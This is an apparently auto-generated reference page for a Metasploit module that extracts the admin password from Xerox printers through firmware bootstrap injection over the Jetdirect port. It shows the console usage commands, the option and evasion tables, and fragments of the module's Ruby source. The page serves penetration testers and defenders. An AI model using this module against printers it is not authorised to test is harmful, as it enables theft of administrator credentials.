Xerox Administrator Console Password Extractor - Metasploit
This page contains detailed information about how to use the auxiliary/gather/xerox_pwd_extract metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Xerox Administrator Console Password Extractor
Module: auxiliary/gather/xerox_pwd_extract
Source code: modules/auxiliary/gather/xerox_pwd_extract.rb
Disclosure date: -
Last modification time: 2019-11-05 18:32:45 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 80
List of CVEs: -
This module will extract the management console's admin password from the Xerox file system using firmware bootstrap injection.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use auxiliary/gather/xerox_pwd_extract
msf auxiliary(xerox_pwd_extract) > show targets
... a list of targets ...
msf auxiliary(xerox_pwd_extract) > set TARGET target-id
msf auxiliary(xerox_pwd_extract) > show options
... show and set options ...
msf auxiliary(xerox_pwd_extract) > exploit
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Go back to menu.
Msfconsole Usage
Here is how the gather/xerox_pwd_extract auxiliary module looks in the msfconsole:
msf6 > use auxiliary/gather/xerox_pwd_extract
msf6 auxiliary(gather/xerox_pwd_extract) > show info
Name: Xerox Administrator Console Password Extractor
Module: auxiliary/gather/xerox_pwd_extract
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Deral "Percentx" Heiland
Pete "Bokojan" Arzamendi
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
JPORT 9100 yes Jetdirect port
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes Web management console port for the printer (TCP)
TIMEOUT 45 yes Timeout to wait for printer job to run
Description:
This module will extract the management console's admin password
from the Xerox file system using firmware bootstrap injection.
Module Options
This is a complete list of options available in the gather/xerox_pwd_extract auxiliary module:
msf6 auxiliary(gather/xerox_pwd_extract) > show options
Module options (auxiliary/gather/xerox_pwd_extract):
Name Current Setting Required Description
---- --------------- -------- -----------
JPORT 9100 yes Jetdirect port
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes Web management console port for the printer (TCP)
TIMEOUT 45 yes Timeout to wait for printer job to run
Advanced Options
Here is a complete list of advanced options supported by the gather/xerox_pwd_extract auxiliary module:
msf6 auxiliary(gather/xerox_pwd_extract) > show advanced
Module advanced options (auxiliary/gather/xerox_pwd_extract):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
ConnectTimeout 10 yes Maximum number of seconds to establish a TCP connection
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCipher no String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
SSLVerifyMode PEER no SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the gather/xerox_pwd_extract module can do:
msf6 auxiliary(gather/xerox_pwd_extract) > show actions
Auxiliary actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the gather/xerox_pwd_extract auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(gather/xerox_pwd_extract) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
TCP::max_send_size 0 no Maxiumum tcp segment size. (0 = disable)
TCP::send_delay 0 no Delays inserted before every send. (0 = disable)
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
<RHOST>:<JPORT> - No credentials extracted
Here is a relevant code snippet related to the "<RHOST>:<JPORT> - No credentials extracted" error message:
55: print_good("#{rhost}:#{jport} - Credentials saved in: #{p}")
56:
57: register_creds('Xerox-HTTP', rhost, rport, 'Admin', passwd)
58:
59: else
60: print_error("#{rhost}:#{jport} - No credentials extracted")
61: end
62: end
63:
64: # Trigger firmware bootstrap write out password data to URL root
65: def write
<RHOST>:<JPORT> - Error connecting to <RHOST>
Here is a relevant code snippet related to the "<RHOST>:<JPORT> - Error connecting to <RHOST>" error message:
92:
93: begin
94: connect(true, 'RPORT' => jport)
95: sock.put(create_print_job)
96: rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout
97: print_error("#{rhost}:#{jport} - Error connecting to #{rhost}")
98: ensure
99: disconnect
100: end
101: end
102:
<RHOST>:<JPORT> - Error getting password from <RHOST>
Here is a relevant code snippet related to the "<RHOST>:<JPORT> - Error getting password from <RHOST>" error message:
109: sock.put(request)
110: res = sock.get_once || ''
111: passwd = res.match(/\r\n\s(.+?)\n/)
112: return passwd ? passwd[1] : ''
113: rescue ::EOFError, ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, ::EOFError
114: print_error("#{rhost}:#{jport} - Error getting password from #{rhost}")
115: return
116: ensure
117: disconnect
118: end
119: end
<RHOST>:<JPORT> - Error removing print job from <RHOST>
Here is a relevant code snippet related to the "<RHOST>:<JPORT> - Error removing print job from <RHOST>" error message:
146:
147: begin
148: connect(true, 'RPORT' => jport)
149: sock.put(remove_print_job)
150: rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout
151: print_error("#{rhost}:#{jport} - Error removing print job from #{rhost}")
152: ensure
153: disconnect
154: end
155: end
156:
Go back to menu.
Related Pull Requests
- #12543 Merged Pull Request: Fix: auxiliary/kerberos_enumusers stops after first match
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #5059 Merged Pull Request: Yard doc corrections
- #4123 Merged Pull Request: Cosmetic title/desc updates
- #4114 Merged Pull Request: Rescue the correct exception: Rex::HostUnreachable
- #4085 Merged Pull Request: Xerox Admin password extractor.
Go back to menu.
See Also
Check also the following modules related to this module:
- auxiliary/gather/xerox_workcentre_5xxx_ldap
- auxiliary/scanner/snmp/xerox_workcentre_enumusers
- exploit/unix/misc/xerox_mfp
- auxiliary/admin/vmware/vcenter_offline_mdb_extract
- auxiliary/gather/konica_minolta_pwd_extract
- auxiliary/gather/wp_ultimate_csv_importer_user_extract
- auxiliary/gather/wp_w3_total_cache_hash_extract
- auxiliary/scanner/printer/canon_iradv_pwd_extract
- auxiliary/admin/http/dlink_dir_645_password_extractor
- auxiliary/admin/http/dlink_dsl320b_password_extractor
- auxiliary/admin/http/netgear_soap_password_extractor
- auxiliary/admin/http/zyxel_admin_password_extractor
- auxiliary/gather/memcached_extractor
- auxiliary/gather/redis_extractor
- auxiliary/scanner/http/meteocontrol_weblog_extractadmin
- auxiliary/scanner/sap/sap_mgmt_con_extractusers
- exploit/windows/browser/facebook_extractiptc
- auxiliary/gather/coldfusion_pwd_props
- auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921
- auxiliary/scanner/http/titan_ftp_admin_pwd
- exploit/linux/misc/ib_pwd_db_aliased
- exploit/windows/ftp/ftpgetter_pwd_reply
- exploit/windows/ftp/ftpshell51_pwd_reply
- exploit/windows/ftp/xftp_client_pwd
- post/windows/gather/credentials/enum_picasa_pwds
Authors
- Deral "Percentx" Heiland
- Pete "Bokojan" Arzamendi
Version
This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.